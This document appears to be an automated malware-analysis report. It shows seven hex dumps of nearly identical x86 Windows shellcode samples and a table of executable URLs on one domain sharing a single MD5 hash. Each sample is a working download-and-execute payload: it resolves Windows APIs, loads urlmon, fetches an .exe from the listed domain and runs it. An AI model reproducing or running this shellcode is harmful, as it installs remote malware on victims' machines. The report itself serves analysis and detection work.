33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 64 6d 69 74 72 79 67 61 69 64 75 6b 2e 63 6e 2f 62 67 6a 6d 70 71 79 32 2e 65 78 65 00 00 | 3.d.@0x..@..p... X....@4.@|.X<jDZ ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f.3..ad..Ph Thre5$.itPTS.... |.U.......l...Ph on.dhurlmT..N... U..P3.PPV.U..... .LRP.6./p.U.[WV. .....U.j...http: //dmitrygaiduk.c n/bgjmpqy2.exe.. |
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 64 6d 69 74 72 79 67 61 69 64 75 6b 2e 63 6e 2f 64 66 68 6a 6e 77 78 33 2e 65 78 65 00 | .d......@0.@T.@. .@..@.. . .=|.w. t..3.d.@0x..@..p ...X....@4.@|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://dmitrygaidu k.cn/dfhjnwx3.ex e. |
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 64 6d 69 74 72 79 67 61 69 64 75 6b 2e 63 6e 2f 64 6b 6d 70 73 33 2e 65 78 65 00 | .d......@0.@T.@. .@..@.. . .=|.w. t..3.d.@0x..@..p ...X....@4.@|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://dmitrygaidu k.cn/dkmps3.exe. |
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 64 6d 69 74 72 79 67 61 69 64 75 6b 2e 63 6e 2f 68 6f 73 75 76 77 78 7a 33 2e 65 78 65 00 00 | .d......@0.@T.@. .@..@.. . .=|.w. t..3.d.@0x..@..p ...X....@4.@|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://dmitrygaidu k.cn/hosuvwxz3.e xe.. |
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 64 6d 69 74 72 79 67 61 69 64 75 6b 2e 63 6e 2f 69 6c 6d 72 79 33 2e 65 78 65 00 | .d......@0.@T.@. .@..@.. . .=|.w. t..3.d.@0x..@..p ...X....@4.@|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://dmitrygaidu k.cn/ilmry3.exe. |
0a 0a 0a 0a 0a 0a 0a 0a 90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 64 6d 69 74 72 79 67 61 69 64 75 6b 2e 63 6e 2f 63 66 6b 75 33 2e 65 78 65 00 00 | .........d...... @0.@T.@..@..@.. . .=|.w.t..3.d.@ 0x..@..p...X.... @4.@|.X<jDZ..+.. ..OZR..V.U.VW.s< .t3x..V.v ..3.IP A.3.6....8.t.... ..@..X;.u.^.F$.. f..H.V........_^ P..}.WR.3..[.... .2.....O.u.ex.f. f.3..ad..PhThre5 $.itPTS....|.U.. .....l...Phon.dh urlmT..N...U..P3 .PPV.U......LRP. 6./p.U.[WV...... U.j...http://dmi trygaiduk.cn/cfk u3.exe.. |
0a 0a 0a 0a 0a 0a 0a 0a 90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 64 6d 69 74 72 79 67 61 69 64 75 6b 2e 63 6e 2f 63 6a 6b 6f 73 75 77 78 79 33 2e 65 78 65 00 | .........d...... @0.@T.@..@..@.. . .=|.w.t..3.d.@ 0x..@..p...X.... @4.@|.X<jDZ..+.. ..OZR..V.U.VW.s< .t3x..V.v ..3.IP A.3.6....8.t.... ..@..X;.u.^.F$.. f..H.V........_^ P..}.WR.3..[.... .2.....O.u.ex.f. f.3..ad..PhThre5 $.itPTS....|.U.. .....l...Phon.dh urlmT..N...U..P3 .PPV.U......LRP. 6./p.U.[WV...... U.j...http://dmi trygaiduk.cn/cjk osuwxy3.exe. |
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://dmitrygaiduk.cn/bcluwy5.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e2bc8e1daae2bcb570a2631fde774d45 | |
| http://dmitrygaiduk.cn/bgjmpqy2.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e2bc8e1daae2bcb570a2631fde774d45 | |
| http://dmitrygaiduk.cn/cfku3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e2bc8e1daae2bcb570a2631fde774d45 | |
| http://dmitrygaiduk.cn/cjkosuwxy3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e2bc8e1daae2bcb570a2631fde774d45 | |
| http://dmitrygaiduk.cn/dfhjnwx3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e2bc8e1daae2bcb570a2631fde774d45 | |
| http://dmitrygaiduk.cn/dkmps3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e2bc8e1daae2bcb570a2631fde774d45 | |
| http://dmitrygaiduk.cn/hosuvwxz3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e2bc8e1daae2bcb570a2631fde774d45 | |
| http://dmitrygaiduk.cn/ilmry3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e2bc8e1daae2bcb570a2631fde774d45 |